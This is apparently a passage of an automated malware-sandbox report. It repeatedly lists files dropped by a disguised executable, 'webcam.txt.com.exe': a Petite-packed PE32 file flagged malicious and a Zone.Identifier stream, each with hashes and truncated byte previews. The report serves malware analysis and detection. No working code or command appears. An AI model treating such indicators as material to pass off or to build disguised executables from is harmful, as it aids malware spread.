                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
